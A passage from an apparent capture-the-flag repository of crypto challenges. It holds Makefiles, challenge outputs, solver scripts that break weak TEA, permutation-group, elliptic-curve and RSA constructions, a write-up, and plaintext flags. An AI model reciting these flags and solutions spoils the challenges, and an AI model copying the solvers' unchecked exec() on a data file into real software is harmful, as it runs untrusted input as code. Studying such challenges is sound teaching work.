tea_ecb_decrypt(key, enc_flag): 31 | key = [b2l(key[i:i+4]) for i in range(0, len(key), 4)] 32 | blocks = [enc_flag[i:i+8] for i in 
range(0, len(enc_flag), 8)] 33 | flag = b'' 34 | 35 | for ct in blocks: 36 | flag += decrypt_block(key, ct) 37 | 38 | return flag 39 | 40 | def pwn(): 41 | key, enc_flag = load_data() 42 | flag = tea_ecb_decrypt(key, enc_flag) 43 | print(flag) 44 | 45 | if __name__ == '__main__': 46 | pwn() -------------------------------------------------------------------------------- /crypto/[Hard] Permuted/htb/secret.py: -------------------------------------------------------------------------------- 1 | a = 839949590738986464 2 | b = 828039274502849303 3 | 4 | FLAG = b'HTB{w3lL_n0T_aLl_gRoUpS_aRe_eQUaL_!!}' 5 | -------------------------------------------------------------------------------- /crypto/[Hard] Permuted/htb/solve.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | 4 | from hashlib import sha256 5 | 6 | from sympy.ntheory.modular import crt 7 | 8 | # DLP found in https://www.researchgate.net/publication/326514386_Cryptanalysis_of_a_Proposal_Based_on_the_Discrete_Logarithm_Problem_Inside_Sn 9 | class Permutation: 10 | def __init__(self, mapping): 11 | self.length = len(mapping) 12 | 13 | assert set(mapping) == set(range(self.length)) # ensure it contains all numbers from 0 to length-1, with no repetitions 14 | self.mapping = list(mapping) 15 | 16 | def __call__(self, *args, **kwargs): 17 | idx, *_ = args 18 | assert idx in range(self.length) 19 | return self.mapping[idx] 20 | 21 | def __mul__(self, other): 22 | ans = [] 23 | 24 | for i in range(self.length): 25 | ans.append(self(other(i))) 26 | 27 | return Permutation(ans) 28 | 29 | def __pow__(self, power, modulo=None): 30 | ans = Permutation.identity(self.length) 31 | ctr = self 32 | 33 | while power > 0: 34 | if power % 2 == 1: 35 | ans *= ctr 36 | ctr *= ctr 37 | power //= 2 38 | 39 | return ans 40 | 41 | def __str__(self): 42 | return str(self.mapping) 43 | 44 | def cycles(self): 45 | # this was 
added! 46 | cycles = [] 47 | used = set() 48 | # each cycle is recorded in traversal order: [i, self(i), self(self(i)), ...] 49 | for i in self.mapping: 50 | if i in used: 51 | continue 52 | 53 | curr_cycle = [i] 54 | used.add(i) 55 | 56 | idx = self(i) 57 | while idx not in used: 58 | curr_cycle.append(idx) 59 | used.add(idx) 60 | idx = self(idx) 61 | 62 | cycles.append(curr_cycle) 63 | 64 | return cycles 65 | # identity takes no self and carries no @staticmethod; __pow__ calls it through the class as Permutation.identity(n) 66 | def identity(length): 67 | return Permutation(range(length)) 68 | 69 | 70 | # dlp: intended to recover an exponent a with g**a == h using only the cycle structure of g and h; the result is not verified here 71 | def dlp(g, h): 72 | # g is base 73 | # h is result 74 | g_cycles = g.cycles() 75 | h_cycles = h.cycles() 76 | 77 | print('g cycles:', g_cycles) 78 | print('h cycles:', h_cycles) 79 | # G[i] = (index of the g-cycle containing i, position of i inside that cycle); H is the same for h and is only printed 80 | G = [] 81 | H = [] 82 | 83 | for i in range(g.length): 84 | for j, c in enumerate(g_cycles): 85 | if i in c: 86 | G.append((j, c.index(i))) 87 | 88 | for j, c in enumerate(h_cycles): 89 | if i in c: 90 | H.append((j, c.index(i))) 91 | 92 | print('G:', G) 93 | print('H:', H) 94 | 95 | First = [] 96 | Second = [] 97 | # for every h-cycle: its first element x and the element h maps x to (c[1 % len(c)] is x itself for a 1-cycle) 98 | for c in h_cycles: 99 | First.append(c[0]) 100 | Second.append(c[1 % len(c)]) 101 | 102 | print('first:', First) 103 | print('second:', Second) 104 | 105 | D = [] 106 | L = [] 107 | for i in range(len(Second)): 108 | dist = G[Second[i]][1] - G[First[i]][1] # difference of positions in g's cycle listing; presumably a modulo the cycle length when h == g**a (assumes x and h(x) lie in the same g-cycle) 109 | D.append(dist) 110 | L.append(len(h_cycles[i])) # modulus for this congruence: length of the h-cycle 111 | 112 | print('D:', D) 113 | print('L:', L) 114 | 115 | alpha = crt(L, D) # sympy crt(moduli, residues) -> (residue, combined modulus) 116 | 117 | return int(alpha[0]) # only the residue is returned, i.e. the exponent modulo the combined modulus 118 | # Takeaway: in a permutation group the exponent falls out of per-cycle position differences plus CRT, so the discrete-log problem there is not hard 119 | 120 | # solve! 
121 | with open('output.txt') as f: 122 | exec(f.read()) # NOTE(review): runs the whole of output.txt as Python code; g, A, B and c used below are presumably defined by it. Only run this on a file you trust, or parse the assignments instead (e.g. ast.literal_eval on each right-hand side) 123 | 124 | g = Permutation(g) 125 | A = Permutation(A) 126 | B = Permutation(B) 127 | 128 | a = dlp(g, A) # exponent relating A to g (presumably A == g**a; not re-checked here) 129 | 130 | # decrypt 131 | C = B**a # presumably the shared permutation both sides derive 132 | 133 | sec = tuple(C.mapping) 134 | sec = hash(sec) # NOTE(review): built-in hash() is not a specified, stable digest; its value for a tuple depends on the interpreter build/version, so the key below matches only on an interpreter that hashes tuples like the one that produced the ciphertext (confirm) 135 | sec = long_to_bytes(sec) 136 | 137 | hash = sha256() # rebinds the name hash, shadowing the built-in that was called on line 134 138 | hash.update(sec) 139 | 140 | key = hash.digest()[16:32] # last 16 bytes of the SHA-256 digest, used as the AES key 141 | iv = b"mg'g\xce\x08\xdbYN2\x89\xad\xedlY\xb9" 142 | 143 | cipher = AES.new(key, AES.MODE_CBC, iv) 144 | 145 | decrypted = cipher.decrypt(c) # no unpadding is applied; the raw CBC plaintext is printed 146 | print('Flag:', decrypted) 147 | 148 | # ~70 seconds 149 | -------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/crypto_$(name); \ 5 | cp server.py ../release/crypto_$(name); \ 6 | cp tea.py ../htb; 7 | 8 | @cd release; \ 9 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 10 | unzip -l ./crypto_$(name).zip; 11 | 12 | @echo [+] Challenge was built successfully. 13 | else 14 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 15 | endif 16 | 17 | flag: 18 | @echo [+] Flag : $$(cd challenge; python3 -c 'from secret import FLAG; print(FLAG);') 19 | 20 | solver: 21 | @echo [+] Running solver 22 | @echo $$(cd challenge ; python3 ../htb/solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @echo [+] Challenge release deleted successfully. 
-------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/htb/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import process, remote, xor 2 | from tea import Cipher as TEA 3 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 4 | import os 5 | 6 | HOST = 'localhost' 7 | PORT = 1337 8 | # recover_iv: submit a (ciphertext, key) pair with a known key, read back the CBC ciphertext the server prints, and derive the IV from its first block 9 | def recover_iv(): 10 | io = process(['python3', '../challenge/server.py'], level='error') 11 | io.recvuntil(b'message: ') 12 | server_message = bytes.fromhex(io.recvline().decode()) 13 | key = b'\x00'*16 # all-zero key; decrypt_block below relies on this (see its NOTE) 14 | ct = TEA(key).encrypt(server_message) # encrypt with ECB 15 | io.sendlineafter(b'(in hex) : ', ct.hex().encode()) 16 | io.sendlineafter(b'(in hex) : ', key.hex().encode()) 17 | io.recvuntil(b'but ') 18 | enc_server_msg = bytes.fromhex(io.recv(48).decode()) # get CBC ciphertext 19 | dec_msg = decrypt_block(key, enc_server_msg[:8]) 20 | iv = xor(dec_msg[:8], server_message[:8]) # CBC first block: C0 = E_k(P0 xor IV), hence D_k(C0) xor P0 = IV 21 | return iv 22 | 23 | # decrypt_block: inverse of Cipher.encrypt_block in tea.py for one 8-byte block (32 rounds, run backwards) 24 | def decrypt_block(key, ct): 25 | m0 = b2l(ct[:4]) 26 | m1 = b2l(ct[4:]) 27 | msk = (1 << 32) - 1 28 | DELTA = 0x9e3779b9 29 | s = 0xc6ef3720 # DELTA * 32 mod 2**32, i.e. the running sum after the 32 encryption rounds 30 | 31 | for i in range(32): 32 | m1 -= ((m0 << 4) + key[2]) ^ (m0 + s) ^ ((m0 >> 5) + key[3]) # NOTE(review): key is indexed directly; for the bytes key passed by recover_iv, key[i] is a single byte value, which equals the 32-bit key word only because that key is all zeros 33 | m1 &= msk 34 | m0 -= ((m1 << 4) + key[0]) ^ (m1 + s) ^ ((m1 >> 5) + key[1]) 35 | m0 &= msk 36 | s -= DELTA 37 | 38 | m = ((m0 << 32) + m1) & ((1 << 64) - 1) 39 | 40 | return l2b(m) # NOTE(review): long_to_bytes drops leading zero bytes, so a block whose top byte is 0 comes back shorter than 8 bytes; l2b(m, 8) would pad it 41 | 42 | # https://www.tayloredge.com/reference/Mathematics/VRAndem.pdf 43 | def get_equivalent_keys(key): 44 | n = l2b(1 << 31) # b'\x80\x00\x00\x00': XOR with it flips the top bit of a 32-bit key word 45 | k0, k1, k2, k3 = [key[i:i+4] for i in range(0, len(key), 4)] 46 | # flipping the top bit of k0 and k1 together (or k2 and k3 together) changes both key-dependent sums of a round by 2**31, and the two flips cancel in the XOR, so all four keys encrypt identically 47 | key0 = k0 + k1 + k2 + k3 48 | key1 = k0 + k1 + xor(k2, n) + xor(k3, n) 49 | key2 = xor(k0, n) + xor(k1, n) + k2 + k3 50 | key3 = xor(k0, n) + xor(k1, n) + xor(k2, n) + xor(k3, n) 51 | 52 | return [key0, key1, key2, key3] # key0 is the input key itself; takeaway: every TEA key has three equivalents, so distinct keys do not guarantee distinct ciphertexts 53 | 54 | def solve_task(io, server_message, iv): 55 | key = os.urandom(16) 56 | keys = get_equivalent_keys(key) 
57 | ct = TEA(key, iv).encrypt(server_message) 58 | assert all([ct == TEA(k, iv).encrypt(server_message) for k in keys]), 'Something went wrong' # local sanity check: all four keys must give the same CBC ciphertext before anything is sent 59 | io.sendlineafter(b'(in hex) : ', ct.hex().encode()) 60 | for j in range(4): 61 | io.sendlineafter(b'(in hex) : ', keys[j].hex().encode()) 62 | return True 63 | # get_flag: start a new server process, answer ten rounds with solve_task, then read the line that follows 64 | def get_flag(iv): 65 | # io = remote(HOST, PORT) 66 | io = process(['python3', '../challenge/server.py'], level='error') # NOTE(review): the iv was recovered from a different server process; reusing it here presumably works only because the server's IV is fixed across runs (confirm in server.py) 67 | io.recvuntil(b'message: ') 68 | server_msg = bytes.fromhex(io.recvline().decode()) 69 | for i in range(10): 70 | assert solve_task(io, server_msg, iv) 71 | flag = io.recvline().decode() 72 | return flag 73 | 74 | def pwn(): 75 | iv = recover_iv() 76 | flag = get_flag(iv) 77 | print(flag) 78 | 79 | if __name__ == '__main__': 80 | pwn() -------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/htb/tea.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad 2 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 3 | from enum import Enum 4 | 5 | class Mode(Enum): 6 | ECB = 0x01 7 | CBC = 0x02 8 | 9 | class Cipher: 10 | def __init__(self, key, iv=None): 11 | self.BLOCK_SIZE = 64 # block size in bits; BLOCK_SIZE//8 is used below as the byte count 12 | self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)] # key split into 4-byte words (four words for a 16-byte key) 13 | self.DELTA = 0x9e3779b9 14 | self.IV = iv 15 | if self.IV: # NOTE(review): truthiness test, so an empty IV (b'') selects ECB just like None 16 | self.mode = Mode.CBC 17 | else: 18 | self.mode = Mode.ECB 19 | 20 | def _xor(self, a, b): 21 | return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b)) # zip() stops at the shorter input, so unequal lengths are truncated silently 22 | 23 | def encrypt(self, msg): 24 | msg = pad(msg, self.BLOCK_SIZE//8) # Crypto.Util.Padding.pad to a multiple of 8 bytes (PKCS#7 by default) 25 | blocks = [msg[i:i+self.BLOCK_SIZE//8] for i in range(0, len(msg), self.BLOCK_SIZE//8)] 26 | 27 | ct = b'' 28 | if self.mode == Mode.ECB: 29 | for pt in blocks: 30 | ct += self.encrypt_block(pt) 31 | elif self.mode == Mode.CBC: 32 | X = self.IV # chaining value: the IV for the first block, then the previous ciphertext block 33 | for pt in blocks: 34 | enc_block = self.encrypt_block(self._xor(X, pt)) 35 | ct += 
enc_block 36 | X = enc_block 37 | return ct 38 | 39 | def encrypt_block(self, msg): 40 | m0 = b2l(msg[:4]) 41 | m1 = b2l(msg[4:]) 42 | K = self.KEY 43 | msk = (1 << (self.BLOCK_SIZE//2)) - 1 44 | 45 | s = 0 46 | for i in range(32): 47 | s += self.DELTA 48 | m0 += ((m1 << 4) + K[0]) ^ (m1 + s) ^ ((m1 >> 5) + K[1]) 49 | m0 &= msk 50 | m1 += ((m0 << 4) + K[2]) ^ (m0 + s) ^ ((m0 >> 5) + K[3]) 51 | m1 &= msk 52 | 53 | m = ((m0 << (self.BLOCK_SIZE//2)) + m1) & ((1 << self.BLOCK_SIZE) - 1) # m = m0 || m1 54 | 55 | return l2b(m) -------------------------------------------------------------------------------- /crypto/[Insane] ROT128/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/crypto_$(name); \ 5 | cp server.py ../release/crypto_$(name); 6 | 7 | @cd release; \ 8 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 9 | unzip -l ./crypto_$(name).zip; 10 | 11 | @echo [+] Challenge was built successfully. 12 | else 13 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 14 | endif 15 | 16 | flag: 17 | @echo [+] Flag : $$(cd challenge; python3 -c 'from secret import FLAG; print(FLAG);') 18 | 19 | solver: 20 | @echo [+] Running solver 21 | @echo $$(cd challenge ; sage ../htb/solver.sage) 22 | @find ./ -name "*.sage.py" -type f -delete 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @find . -name "*.sage.py" -type f -delete 29 | @echo [+] Challenge release deleted successfully. 
-------------------------------------------------------------------------------- /crypto/[Medium] Arranged/htb/solve.sage: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | from hashlib import sha256 4 | 5 | enc_flag = b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab' 6 | 7 | def decrypt(Q): 8 | secret = Q[0] 9 | 10 | hash = sha256() 11 | hash.update(long_to_bytes(secret)) 12 | 13 | key = hash.digest()[16:32] 14 | iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en' 15 | cipher = AES.new(key, AES.MODE_CBC, iv) 16 | 17 | decrypted = cipher.decrypt(enc_flag) 18 | return decrypted 19 | 20 | # first retrieve p 21 | # we know 3 points 22 | # we can eliminate b and get 3 equations, use GCD for p 23 | A = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696) 24 | B = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865) 25 | G = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253) 26 | 27 | # y^2 = x^3 + 726x + b 28 | # A.y^2 = A.x^3 + 726*A.x + b 29 | # B.y^2 = B.x^3 + 726*B.x + b 30 | # A.y^2 - 
B.y^2 = A.x^3 + 726*A.x - B.x^3 - 726*B.x 31 | # A.y^2 - B.y^2 - A.x^3 - 726*A.x + B.x^3 + 726*B.x = 0 mod p 32 | # A.y^2 - G.y^2 - A.x^3 - 726*A.x + G.x^3 + 726*G.x = 0 mod p 33 | # x1 and x2 below are the two left-hand sides evaluated over the integers, so both are multiples of p 34 | x1 = A[1]^2 - B[1]^2 - A[0]^3 - 726*A[0] + B[0]^3 + 726*B[0] 35 | x2 = A[1]^2 - G[1]^2 - A[0]^3 - 726*A[0] + G[0]^3 + 726*G[0] 36 | 37 | p = gcd(x1, x2) # NOTE(review): the gcd is p times a possible small cofactor; GF() below only accepts a prime (power) order, so a leftover cofactor would have to be removed first 38 | F = GF(p) 39 | b = (A[1]^2 - A[0]^3 - 726*A[0]) % p # b recovered from point A via y^2 = x^3 + 726x + b 40 | 41 | # note that order of G is 11 42 | E = EllipticCurve(F, [726, b]) 43 | G = E(G[0], G[1]) 44 | # print(G.order()) 45 | # with a generator of order 11 every scalar multiple of G is one of 11 points, so the shared point can be guessed however large the private scalars are 46 | # brute force the result 47 | for i in range(1, 12): 48 | P = i*G 49 | msg = decrypt(P) 50 | 51 | if b'HTB{' in msg: 52 | print(msg) 53 | break 54 | -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @rm -rf htb/output.txt 29 | @echo [+] Challenge release deleted successfully. 
30 | -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/htb/output.txt: -------------------------------------------------------------------------------- 1 | n = 118641897764566817417551054135914458085151243893181692085585606712347004549784923154978949512746946759125187896834583143236980760760749398862405478042140850200893707709475167551056980474794729592748211827841494511437980466936302569013868048998752111754493558258605042130232239629213049847684412075111663446003 2 | ct = 7f33a035c6390508cee1d0277f4712bf01a01a46677233f16387fae072d07bdee4f535b0bd66efa4f2475dc8515696cbc4bc2280c20c93726212695d770b0a8295e2bacbd6b59487b329cc36a5516567b948fed368bf02c50a39e6549312dc6badfef84d4e30494e9ef0a47bd97305639c875b16306fcd91146d3d126c1ea476 3 | p = 151441473357136152985216980397525591305875094288738820699069271674022167902643 4 | q = 15624342005774166525024608067426557093567392652723175301615422384508274269305 -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/htb/solver.py: -------------------------------------------------------------------------------- 1 | from math import sqrt 2 | from Crypto.PublicKey import RSA 3 | from Crypto.Cipher import PKCS1_OAEP 4 | 5 | def load_data(): 6 | with open('output.txt') as f: 7 | n = int(f.readline().split(' = ')[1]) 8 | ct = bytes.fromhex(f.readline().split(' = ')[1]) 9 | hint_p = int(f.readline().split(' = ')[1]) 10 | hint_q = int(f.readline().split(' = ')[1]) 11 | return n, ct, hint_p, hint_q 12 | 13 | def decrypt(p, q, n, ct): 14 | e = 0x10001 15 | d = pow(e, -1, (p-1)*(q-1)) 16 | key = RSA.construct((n, e, d)) 17 | flag = PKCS1_OAEP.new(key).decrypt(ct) 18 | return flag 19 | 20 | def create_masks(primelen): 21 | pmask = ''.join(['1' if i % 2 == 0 else '0' for i in range(primelen)]) 22 | qmask = ''.join(['1' if i % 2 == 1 else '0' for i in range(primelen)]) 23 | return pmask, qmask 24 | 25 | def 
bruteforce_digit(i, n, known_prime, prime_to_check, hint_prime): 26 | msk = 10**(i+1) 27 | known_prime = 10**i * (hint_prime % 10) + known_prime # place the lowest remaining digit of the hint at decimal position i of the prime whose digit is known 28 | for d in range(10): 29 | test_prime = 10**i * d + prime_to_check 30 | if n % msk == known_prime * test_prime % msk: # the product must agree with n in its low i+1 decimal digits 31 | updated_prime_to_check = test_prime # correct candidate! update the unknown prime 32 | updated_hint_prime = hint_prime // 10 # move on to the next digit 33 | return known_prime, updated_prime_to_check, updated_hint_prime 34 | # NOTE(review): if no d in 0..9 satisfies the congruence, the loop falls through and None is returned; factor() would then fail when unpacking the result 35 | def factor(n, p, q, hp, hq, pmask, qmask, prime_len): 36 | for i in range(prime_len): 37 | if pmask[-(i+1)] == '1': # digit i (counted from the right) of p is the known one, otherwise q's is; qmask is accepted but never read 38 | p, q, hp = bruteforce_digit(i, n, p, q, hp) 39 | else: 40 | q, p, hq = bruteforce_digit(i, n, q, p, hq) 41 | 42 | assert n == p * q 43 | 44 | return p, q 45 | # Takeaway: knowing the decimal digits of p and q at complementary alternating positions is enough to rebuild both primes from n, one digit at a time 46 | def pwn(): 47 | n, ct, hint_p, hint_q = load_data() 48 | prime_len = len(str(int(sqrt(n)))) # float sqrt; only the decimal digit count is used. math.isqrt(n) would avoid float rounding (decrypt already needs Python 3.8+ for pow(e, -1, ...)) 49 | pmask, qmask = create_masks(prime_len) 50 | p, q = factor(n, 0, 0, hint_p, hint_q, pmask, qmask, prime_len) 51 | flag = decrypt(p, q, n, ct) 52 | print(flag) 53 | 54 | if __name__ == '__main__': 55 | pwn() -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG)') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . 
-name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 32 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/htb/output.txt: -------------------------------------------------------------------------------- 1 | Make sure you wrap the decrypted text with the HTB flag format :-] 2 | DJF_CTA_SWYH_NPDKK_MBZ_QPHTIGPMZY_KRZSQE?!_ZL_CN_PGLIMCU_YU_KJODME_RYGZXL -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/htb/solver.py: -------------------------------------------------------------------------------- 1 | def to_identity_map(a): 2 | return ord(a) - 0x41 3 | 4 | def from_identity_map(a): 5 | return chr(a % 26 + 0x41) 6 | 7 | with open('output.txt') as f: 8 | f.readline() 9 | enc = f.readline() 10 | 11 | flag = '' 12 | for i in range(len(enc)): 13 | ech = enc[i] 14 | if not ech.isalpha(): 15 | m = ech 16 | else: 17 | echi = to_identity_map(ech) 18 | m = from_identity_map(echi - i) 19 | flag += m 20 | 21 | print(f'HTB{{{flag}}}') -------------------------------------------------------------------------------- /crypto/[Very Easy] Makeshift/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Makeshift 4 | 5 | ​ 29th Jan 2024 / Document No. D24.102.25 6 | 7 | ​ Challenge Author(s): ir0nstone 8 | 9 | 10 | 11 | # Synopsis 12 | Makeshift is a Very Easy crypto challenge that involves reversing a simple custom "encryption" algorithm. 13 | 14 | # Description: 15 | Weak and starved, you struggle to plod on. Food is a commodity at this stage, but you can’t lose your alertness - to do so would spell death. 
You realise that to survive you will need a weapon, both to kill and to hunt, but the field is bare of stones. As you drop your body to the floor, something sharp sticks out of the undergrowth and into your thigh. As you grab a hold and pull it out, you realise it’s a long stick; not the finest of weapons, but once sharpened could be the difference between dying of hunger and dying with honour in combat. 16 | 17 | ## Skills Required 18 | - Understanding Python code 19 | 20 | ## Skills Learned 21 | - Undoing programmatic operations 22 | 23 | # Enumeration 24 | We are given the following script: 25 | 26 | ```py 27 | from secret import FLAG 28 | 29 | flag = FLAG[::-1] 30 | new_flag = '' 31 | 32 | for i in range(0, len(flag), 3): 33 | new_flag += flag[i+1] 34 | new_flag += flag[i+2] 35 | new_flag += flag[i] 36 | 37 | print(new_flag) 38 | ``` 39 | 40 | `output.txt` also gives us an encrypted flag: 41 | 42 | ``` 43 | !?}De!e3d_5n_nipaOw_3eTR3bt4{_THB 44 | ``` 45 | 46 | The flag is "encrypted" in a very simple way; no key is involved, so knowing the algorithm is enough to undo it: 47 | * First it is reversed 48 | * It is then split into groups of three characters, which all have the same thing done to them: 49 | * The second character is placed first 50 | * The third character is placed second 51 | * The first character is placed third 52 | * In essence, every sequence of characters ABC is changed to BCA 53 | 54 | # Solution 55 | In order to reverse this, we have to undo the operations in the opposite order. So, given each group 56 | of three characters BCA, we have to convert it back to ABC. We can do this by making sure that: 57 | 58 | * The third character is placed first 59 | * The first character is placed second 60 | * The second character is placed third 61 | 62 | After that, we simply have to reverse the whole string. 
63 | 64 | ```python 65 | enc_flag = r'!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB' 66 | 67 | new_flag = '' 68 | 69 | for i in range(0, len(enc_flag), 3): 70 | new_flag += enc_flag[i+2] 71 | new_flag += enc_flag[i] 72 | new_flag += enc_flag[i+1] 73 | 74 | flag = new_flag[::-1] 75 | 76 | print(flag) 77 | ``` 78 | 79 | And we get the flag! 80 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Makeshift/htb/solve.py: -------------------------------------------------------------------------------- 1 | enc_flag = r'!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB' 2 | 3 | new_flag = '' 4 | 5 | for i in range(0, len(enc_flag), 3): 6 | new_flag += enc_flag[i+2] 7 | new_flag += enc_flag[i] 8 | new_flag += enc_flag[i+1] 9 | 10 | flag = new_flag[::-1] 11 | 12 | print(flag) 13 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . -name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 
32 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/htb/output.txt: -------------------------------------------------------------------------------- 1 | n = 144595784022187052238125262458232959109987136704231245881870735843030914418780422519197073054193003090872912033596512666042758783502695953159051463566278382720140120749528617388336646147072604310690631290350467553484062369903150007357049541933018919332888376075574412714397536728967816658337874664379646535347 2 | e = 65537 3 | c = 15114190905253542247495696649766224943647565245575793033722173362381895081574269185793855569028304967185492350704248662115269163914175084627211079781200695659317523835901228170250632843476020488370822347715086086989906717932813405479321939826364601353394090531331666739056025477042690259429336665430591623215 4 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/htb/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import isPrime, long_to_bytes 2 | 3 | with open('output.txt') as f: 4 | exec(f.read()) 5 | 6 | assert isPrime(n) 7 | 8 | phi = n-1 9 | d = pow(e, -1, phi) 10 | m = pow(c, d, n) 11 | print(long_to_bytes(m).decode()) -------------------------------------------------------------------------------- /forensics/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/.gitkeep -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake 
Boost/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup1.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup2.png: -------------------------------------------------------------------------------- 